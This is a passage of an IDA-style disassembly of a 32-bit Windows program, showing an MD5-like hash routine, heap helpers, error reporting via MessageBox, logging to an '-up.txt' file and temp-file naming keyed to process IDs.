shr edx, 16h
shl eax, 0Ah
or edx, eax
mov eax, ebx
add edx, ecx
not eax
or eax, edx
xor eax, ecx
add eax, [ebp+var_18]
lea eax, [edi+eax-546BDC59h]
mov edi, eax
shr edi, 11h
shl eax, 0Fh
or edi, eax
mov eax, ecx
add edi, edx
push 85845DD1h
not eax
or eax, edi
push 15h
xor eax, edx
push [ebp+var_4C]
add eax, [ebp+var_3C]
lea ebx, [ebx+eax-36C5FC7h]
mov eax, ebx
shl eax, 15h
shr ebx, 0Bh
or eax, ebx
mov ebx, edx
add eax, edi
not ebx
or ebx, eax
mov [ebp+var_8], eax
xor ebx, edi
add ebx, [ebp+var_20]
lea ecx, [ecx+ebx+655B59C3h]
mov ebx, ecx
shr ebx, 1Ah
shl ecx, 6
or ebx, ecx
mov ecx, edi
add ebx, eax
not ecx
or ecx, ebx
push ebx
xor ecx, eax
mov [ebp+var_4], ebx
add ecx, [ebp+var_44]
not eax
lea edx, [edx+ecx-70F3336Eh]
mov ecx, edx
shr ecx, 16h
shl edx, 0Ah
or ecx, edx
add ecx, ebx
or eax, ecx
push ecx
xor eax, ebx
mov [ebp+var_10], ecx
add eax, [ebp+var_28]
lea eax, [edi+eax-100B83h]
mov edx, eax
shr edx, 11h
shl eax, 0Fh
or edx, eax
lea eax, [ebp+var_8]
add edx, ecx
push edx
push eax
mov [ebp+var_C], edx
call sub_4D8280
push 6FA87E4Fh
push 6
push [ebp+var_30]
lea eax, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_4D8280
push 0FE2CE6E0h
push 0Ah
push [ebp+var_14]
lea eax, [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_4D8280
add esp, 54h
push 0A3014314h
push 0Fh
push [ebp+var_38]
lea eax, [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push eax
call sub_4D8280
push 4E0811A1h
push 15h
push [ebp+var_1C]
lea eax, [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push eax
call sub_4D8280
push 0F7537E82h
push 6
push [ebp+var_40]
lea eax, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_4D8280
add esp, 54h
lea eax, [ebp+var_10]
push 0BD3AF235h
push 0Ah
push [ebp+var_24]
push [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_4D8280
push 2AD7D2BBh
push 0Fh
push [ebp+var_48]
lea eax, [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push eax
call sub_4D8280
push 0EB86D391h
push 15h
push [ebp+var_2C]
lea eax, [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push eax
call sub_4D8280
mov eax, [ebp+var_4]
add esp, 54h
add [esi], eax
mov eax, [ebp+var_8]
add [esi+4], eax
mov eax, [ebp+var_C]
add [esi+8], eax
mov eax, [ebp+var_10]
add [esi+0Ch], eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4D79D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8280 proc near ; CODE XREF: sub_4D79D8+79C�p
; sub_4D79D8+7B8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
mov edx, [ebp+arg_0]
not eax
or eax, [ebp+arg_4]
push esi
push 20h
xor eax, [ebp+arg_8]
pop ecx
sub ecx, [ebp+arg_14]
add eax, [edx]
add eax, [ebp+arg_10]
add eax, [ebp+arg_18]
mov esi, eax
shr esi, cl
mov ecx, [ebp+arg_14]
shl eax, cl
or esi, eax
add esi, [ebp+arg_4]
mov [edx], esi
pop esi
pop ebp
retn
sub_4D8280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D82B3 proc near ; CODE XREF: sub_4D785D+F2�p
; sub_4D785D+12D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jbe short loc_4D82F6
mov edx, [ebp+arg_0]
mov ecx, [ebp+arg_4]
push esi
or esi, 0FFFFFFFFh
lea eax, [edx+1]
sub esi, edx
loc_4D82CB: ; CODE XREF: sub_4D82B3+40�j
mov dl, [ecx]
mov [eax-1], dl
mov edx, [ecx]
shr edx, 8
mov [eax], dl
mov edx, [ecx]
shr edx, 10h
mov [eax+1], dl
mov edx, [ecx]
shr edx, 18h
mov [eax+2], dl
add eax, 4
add ecx, 4
lea edx, [esi+eax]
cmp edx, [ebp+arg_8]
jb short loc_4D82CB
pop esi
loc_4D82F6: ; CODE XREF: sub_4D82B3+7�j
pop ebp
retn 0Ch
sub_4D82B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D82FA proc near ; CODE XREF: sub_4D79D8+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jbe short loc_4D833E
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push esi
push edi
push 0FFFFFFFEh
lea eax, [edx+2]
pop esi
sub esi, edx
loc_4D8313: ; CODE XREF: sub_4D82FA+40�j
movzx edi, byte ptr [eax-1]
xor edx, edx
mov dh, [eax+1]
mov dl, [eax]
add eax, 4
shl edx, 8
or edx, edi
movzx edi, byte ptr [eax-6]
shl edx, 8
or edx, edi
mov [ecx], edx
lea edx, [esi+eax]
add ecx, 4
cmp edx, [ebp+arg_8]
jb short loc_4D8313
pop edi
pop esi
loc_4D833E: ; CODE XREF: sub_4D82FA+7�j
pop ebp
retn 0Ch
sub_4D82FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8342 proc near ; CODE XREF: _4:004CEC71�p _4:004CEC92�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push 0
push 0
push [ebp+var_4]
call ds:dword_4E1778 ; RaiseException
leave
retn
sub_4D8342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D835A proc near ; CODE XREF: sub_4CD2E0+3C8�p
; _4:004CEE70�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
call sub_4D8397
mov [ebp+var_8], eax
cmp [ebp+arg_0], 0
jnz short loc_4D8371
xor eax, eax
jmp short locret_4D8395
; ---------------------------------------------------------------------------
loc_4D8371: ; CODE XREF: sub_4D835A+11�j
push [ebp+arg_0]
push 8
push [ebp+var_8]
call ds:dword_4E1740 ; RtlAllocateHeap
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4D8392
mov ecx, 0EF000009h
call sub_4D8342
loc_4D8392: ; CODE XREF: sub_4D835A+2C�j
mov eax, [ebp+var_4]
locret_4D8395: ; CODE XREF: sub_4D835A+15�j
leave
retn
sub_4D835A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8397 proc near ; CODE XREF: sub_4D835A+5�p
; sub_4D83DD:loc_4D83E9�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4E1A44, 0
jnz short loc_4D83C0
push 0
push 10000h
push 0
call ds:dword_4E1748 ; HeapCreate
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_4E1A44, eax
jmp short loc_4D83C8
; ---------------------------------------------------------------------------
loc_4D83C0: ; CODE XREF: sub_4D8397+B�j
mov eax, ds:dword_4E1A44
mov [ebp+var_4], eax
loc_4D83C8: ; CODE XREF: sub_4D8397+27�j
cmp [ebp+var_4], 0
jnz short loc_4D83D8
mov ecx, 0EF00000Dh
call sub_4D8342
loc_4D83D8: ; CODE XREF: sub_4D8397+35�j
mov eax, [ebp+var_4]
leave
retn
sub_4D8397 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D83DD proc near ; CODE XREF: _4:004CE1FE�p
; sub_4CF00C+10�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_4D83E9
jmp short locret_4D83FF
; ---------------------------------------------------------------------------
loc_4D83E9: ; CODE XREF: sub_4D83DD+8�j
call sub_4D8397
mov [ebp+var_4], eax
push [ebp+arg_0]
push 0
push [ebp+var_4]
call ds:dword_4E1744 ; RtlFreeHeap
locret_4D83FF: ; CODE XREF: sub_4D83DD+A�j
leave
retn
sub_4D83DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8401 proc near ; CODE XREF: sub_4D848C+64�p
; sub_4D84F7+3A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push 0
call ds:dword_4E17C4 ; ChangeDisplaySettingsA
push 10h
push ds:off_4DE4F4
push [ebp+var_4]
push 0
call ds:dword_4E17D0 ; MessageBoxA
push 0
call ds:dword_4E16E4 ; GetCurrentProcess
push eax
call ds:dword_4E1798 ; TerminateProcess
leave
retn
sub_4D8401 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8436 proc near ; CODE XREF: sub_4D848C+52�p
; sub_4D848C+5C�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE500
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_1C], ecx
and [ebp+var_4], 0
push [ebp+var_1C]
call sub_4D8538
pop ecx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4D847D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_4D847D: ; CODE XREF: sub_4D8436+3A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4D8436 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D848C proc near ; CODE XREF: sub_4CF036+C4�p
; sub_4CF94C+CD�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push offset dword_4E1A28
call ds:dword_4E16C4 ; RtlEnterCriticalSection
mov [ebp+var_8], offset dword_4E1A48
push [ebp+arg_4]
push [ebp+arg_0]
push offset aErrorAtSDReaso ; "Error at %s:%d\n\nReason: "
push [ebp+var_8]
call ds:dword_4E17D4 ; wsprintfA
add esp, 10h
mov [ebp+var_C], eax
lea eax, [ebp+arg_C]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
push eax
call ds:dword_4E17D8 ; wvsprintfA
and [ebp+var_4], 0
mov ecx, [ebp+var_8]
call sub_4D8436
mov ecx, offset asc_4E0D5C ; "\n"
call sub_4D8436
mov ecx, [ebp+var_8]
call sub_4D8401
leave
retn
sub_4D848C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D84F7 proc near ; CODE XREF: sub_4D4AB0+128�p
; sub_4DDAB0+8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], offset dword_4E1A48
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push [ebp+var_8]
call ds:dword_4E17D8 ; wvsprintfA
and [ebp+var_4], 0
mov ecx, [ebp+var_8]
call sub_4D8436
mov ecx, offset asc_4E0D5C ; "\n"
call sub_4D8436
mov ecx, [ebp+var_8]
call sub_4D8401
leave
retn
sub_4D84F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8538 proc near ; CODE XREF: sub_4D8436+30�p
; sub_4D8726+74�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE510
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
push offset dword_4E1A28
call ds:dword_4E16C4 ; RtlEnterCriticalSection
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, offset dword_4CD720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz loc_4D86AD
push 400h
call sub_4D835A
pop ecx
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_1C], eax
push 0
call ds:dword_4E1718 ; GetModuleHandleA
mov ecx, offset dword_4CD720
mov ecx, [ecx+4]
mov [ecx+7Ch], eax
mov eax, offset dword_4CD720
mov eax, [eax+4]
cmp dword ptr [eax+7Ch], 0
jnz short loc_4D85C2
jmp loc_4D86F6
; ---------------------------------------------------------------------------
loc_4D85C2: ; CODE XREF: sub_4D8538+83�j
push 400h
push [ebp+var_1C]
mov eax, offset dword_4CD720
mov eax, [eax+4]
push dword ptr [eax+7Ch]
call ds:dword_4E1714 ; GetModuleFileNameA
test eax, eax
jnz short loc_4D85E4
jmp loc_4D86F6
; ---------------------------------------------------------------------------
loc_4D85E4: ; CODE XREF: sub_4D8538+A5�j
mov edi, [ebp+var_1C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_24], ecx
push offset aUp_txt ; "-up.txt"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_4E17D4 ; wsprintfA
pop ecx
pop ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push [ebp+var_1C]
call ds:dword_4E16A8 ; CreateFileA
mov ecx, offset dword_4CD720
mov ecx, [ecx+4]
mov [ecx+78h], eax
mov eax, offset dword_4CD720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D8648
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4D8690
loc_4D8648: ; CODE XREF: sub_4D8538+108�j
push offset aUp1_txt ; "-up1.txt"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_4E17D4 ; wsprintfA
pop ecx
pop ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push [ebp+var_1C]
call ds:dword_4E16A8 ; CreateFileA
mov ecx, offset dword_4CD720
mov ecx, [ecx+4]
mov [ecx+78h], eax
mov eax, offset dword_4CD720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
loc_4D8690: ; CODE XREF: sub_4D8538+10E�j
cmp [ebp+var_20], 0
jz short loc_4D869C
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4D869E
loc_4D869C: ; CODE XREF: sub_4D8538+15C�j
jmp short loc_4D86F6
; ---------------------------------------------------------------------------
loc_4D869E: ; CODE XREF: sub_4D8538+162�j
push 2
push 0
push 0
push [ebp+var_20]
call ds:dword_4E1788 ; SetFilePointer
loc_4D86AD: ; CODE XREF: sub_4D8538+4A�j
cmp [ebp+var_20], 0FFFFFFFFh
jz short loc_4D86E7
push 0
lea eax, [ebp+var_28]
push eax
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+arg_0]
push [ebp+var_20]
call ds:dword_4E17BC ; WriteFile
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+var_28], ecx
jz short loc_4D86E7
jmp short loc_4D86F6
; ---------------------------------------------------------------------------
loc_4D86E7: ; CODE XREF: sub_4D8538+179�j
; sub_4D8538+1AB�j ...
push 0FFFFFFFFh
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
jmp short loc_4D8717
; ---------------------------------------------------------------------------
loc_4D86F6: ; CODE XREF: sub_4D8538+85�j
; sub_4D8538+A7�j ...
and [ebp+var_2C], 0
jmp short loc_4D86E7
; ---------------------------------------------------------------------------
loc_4D86FC: ; DATA XREF: _5:004DE518�o
push offset dword_4E1A28
call ds:dword_4E1754 ; RtlLeaveCriticalSection
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_4D83DD
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4D8717: ; CODE XREF: sub_4D8538+1BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4D8538 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8726 proc near ; CODE XREF: sub_4D0C5C+345�p
; sub_4D8C27+1D�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
; FUNCTION CHUNK AT 004D87BB SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE520
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
push 1000h
call sub_4D835A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_1C], eax
lea eax, [ebp+arg_4]
mov [ebp+var_20], eax
push [ebp+var_20]
push [ebp+arg_0]
push [ebp+var_1C]
call ds:dword_4E17D8 ; wvsprintfA
mov [ebp+var_24], eax
push offset asc_4E0D90 ; "\r\n"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_4E17D4 ; wsprintfA
pop ecx
pop ecx
and [ebp+var_20], 0
push [ebp+var_1C]
call sub_4D8538
pop ecx
or [ebp+var_4], 0FFFFFFFFh
call sub_4D87AB
jmp short loc_4D87BB
sub_4D8726 endp
; =============== S U B R O U T I N E =======================================
sub_4D87AB proc near ; CODE XREF: sub_4D8726+7E�p
; DATA XREF: _5:004DE528�o
mov eax, [ebp-1Ch]
mov [ebp-2Ch], eax
push dword ptr [ebp-2Ch]
call sub_4D83DD
pop ecx
retn
sub_4D87AB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D8726
loc_4D87BB: ; CODE XREF: sub_4D8726+83�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D8726
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D87CA proc near ; CODE XREF: sub_4D61E1+D39�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D8883 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE530
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push 1000h
call sub_4D835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_1C], eax
push 0
push 0
lea eax, [ebp+var_20]
push eax
push 400h
call ds:dword_4E1710 ; RtlGetLastWin32Error
push eax
push 0
push 1300h
call ds:dword_4E16DC ; FormatMessageA
cmp [ebp+var_20], 0
jz short loc_4D8859
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_20]
push offset aWindowsErrorSA ; "windows error %s\n at %s(%d)\n"
push [ebp+var_1C]
call ds:dword_4E17D4 ; wsprintfA
add esp, 14h
push [ebp+var_1C]
call sub_4D8538
pop ecx
loc_4D8859: ; CODE XREF: sub_4D87CA+6A�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D8864
jmp short loc_4D8883
sub_4D87CA endp
; =============== S U B R O U T I N E =======================================
sub_4D8864 proc near ; CODE XREF: sub_4D87CA+93�p
; DATA XREF: _5:004DE538�o
cmp dword ptr [ebp-20h], 0
jz short loc_4D8873
push dword ptr [ebp-20h]
call ds:dword_4E1764 ; LocalFree
loc_4D8873: ; CODE XREF: sub_4D8864+4�j
mov eax, [ebp-1Ch]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_4D83DD
pop ecx
retn
sub_4D8864 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D87CA
loc_4D8883: ; CODE XREF: sub_4D87CA+98�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D87CA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8892 proc near ; CODE XREF: sub_4D58CF+A2�p
; sub_4D61E1+1F4�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
movzx eax, ds:byte_4E1A40
and eax, 1
test eax, eax
jnz short loc_4D88BE
mov al, ds:byte_4E1A40
or al, 1
mov ds:byte_4E1A40, al
call ds:dword_4E16E8 ; GetCurrentProcessId
mov ds:dword_4E1A20, eax
loc_4D88BE: ; CODE XREF: sub_4D8892+13�j
cmp [ebp+arg_8], 0
jnz short loc_4D88CE
mov eax, ds:dword_4E1A20
mov [ebp+var_10], eax
jmp short loc_4D88D4
; ---------------------------------------------------------------------------
loc_4D88CE: ; CODE XREF: sub_4D8892+30�j
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
loc_4D88D4: ; CODE XREF: sub_4D8892+3A�j
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
push 124h
call sub_4D835A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
push 49h
pop ecx
xor eax, eax
mov edi, [ebp+var_4]
rep stosd
push [ebp+var_4]
push 104h
call ds:dword_4E1734 ; GetTempPathA
movzx eax, [ebp+arg_4]
test eax, eax
jz short loc_4D8948
mov eax, ds:dword_4E5A48
inc eax
mov ds:dword_4E5A48, eax
push ds:dword_4E5A48
push [ebp+arg_0]
push [ebp+var_8]
push offset aMbx@X@X@X_ ; "MBX@%X@%X@%X.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_4E17D4 ; wsprintfA
add esp, 14h
jmp short loc_4D899B
; ---------------------------------------------------------------------------
loc_4D8948: ; CODE XREF: sub_4D8892+7A�j
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_4D8977
push [ebp+arg_0]
push [ebp+var_8]
push offset aMbx@X@X_ ; "MBX@%X@%X.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_4E17D4 ; wsprintfA
add esp, 10h
jmp short loc_4D899B
; ---------------------------------------------------------------------------
loc_4D8977: ; CODE XREF: sub_4D8892+BA�j
push [ebp+var_8]
push offset aMbx@X@_ ; "MBX@%X@*.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_4E17D4 ; wsprintfA
add esp, 0Ch
loc_4D899B: ; CODE XREF: sub_4D8892+B4�j
; sub_4D8892+E3�j
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_4]
call ds:dword_4E17C8 ; CharUpperBuffA
mov eax, [ebp+var_4]
pop edi
leave
retn
sub_4D8892 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D89B8 proc near ; CODE XREF: sub_4D8A16+E1�p
; sub_4D8A16+150�p
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
movzx eax, [ebp+arg_0]
cmp eax, 30h
jl short loc_4D89D6
movzx eax, [ebp+arg_0]
cmp eax, 39h
jg short loc_4D89D6
movzx eax, [ebp+arg_0]
sub eax, 30h
jmp short loc_4D8A14
; ---------------------------------------------------------------------------
loc_4D89D6: ; CODE XREF: sub_4D89B8+A�j
; sub_4D89B8+13�j
movzx eax, [ebp+arg_0]
cmp eax, 41h
jl short loc_4D89F1
movzx eax, [ebp+arg_0]
cmp eax, 46h
jg short loc_4D89F1
movzx eax, [ebp+arg_0]
sub eax, 37h
jmp short loc_4D8A14
; ---------------------------------------------------------------------------
loc_4D89F1: ; CODE XREF: sub_4D89B8+25�j
; sub_4D89B8+2E�j
movzx eax, [ebp+arg_0]
cmp eax, 61h
jl short loc_4D8A0C
movzx eax, [ebp+arg_0]
cmp eax, 66h
jg short loc_4D8A0C
movzx eax, [ebp+arg_0]
sub eax, 57h
jmp short loc_4D8A14
; ---------------------------------------------------------------------------
loc_4D8A0C: ; CODE XREF: sub_4D89B8+40�j
; sub_4D89B8+49�j
mov eax, [ebp+arg_4]
mov byte ptr [eax], 1
xor eax, eax
loc_4D8A14: ; CODE XREF: sub_4D89B8+1C�j
; sub_4D89B8+37�j ...
pop ebp
retn
sub_4D89B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8A16 proc near ; CODE XREF: sub_4D153F+2DE�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE540
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 40h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jz loc_4D8BF5
call ds:dword_4E16E8 ; GetCurrentProcessId
mov [ebp+var_1C], eax
push 5Ch
push [ebp+arg_0]
call sub_4CC700
pop ecx
pop ecx
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4D8A71
mov eax, [ebp+var_24]
inc eax
mov [ebp+arg_0], eax
loc_4D8A71: ; CODE XREF: sub_4D8A16+52�j
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_20], ecx
cmp [ebp+var_20], 4
jle loc_4D8BF5
push 4
pop ecx
mov edi, offset aMbx@ ; "MBX@"
mov esi, [ebp+arg_0]
xor eax, eax
mov [ebp+var_34], eax
repe cmpsb
jz short loc_4D8AA7
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_34], eax
loc_4D8AA7: ; CODE XREF: sub_4D8A16+87�j
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz loc_4D8BF5
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
push 40h
push [ebp+arg_0]
call sub_4CC640
pop ecx
pop ecx
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_4D8BF5
and [ebp+var_30], 0
and [ebp+var_2C], 0
loc_4D8AE1: ; CODE XREF: sub_4D8A16+FC�j
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+arg_0]
mov al, [eax]
mov byte ptr [ebp+var_3C], al
push [ebp+var_3C]
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
call sub_4D89B8
pop ecx
pop ecx
and eax, 0Fh
mov ecx, [ebp+var_30]
shl ecx, 4
or eax, ecx
mov [ebp+var_30], eax
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_28]
jnz short loc_4D8AE1
movzx eax, [ebp+var_2C]
test eax, eax
jnz loc_4D8BF5
mov eax, [ebp+var_30]
cmp eax, [ebp+var_1C]
jnz loc_4D8BF5
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push 2Eh
push [ebp+arg_0]
call sub_4CC640
pop ecx
pop ecx
mov [ebp+var_28], eax
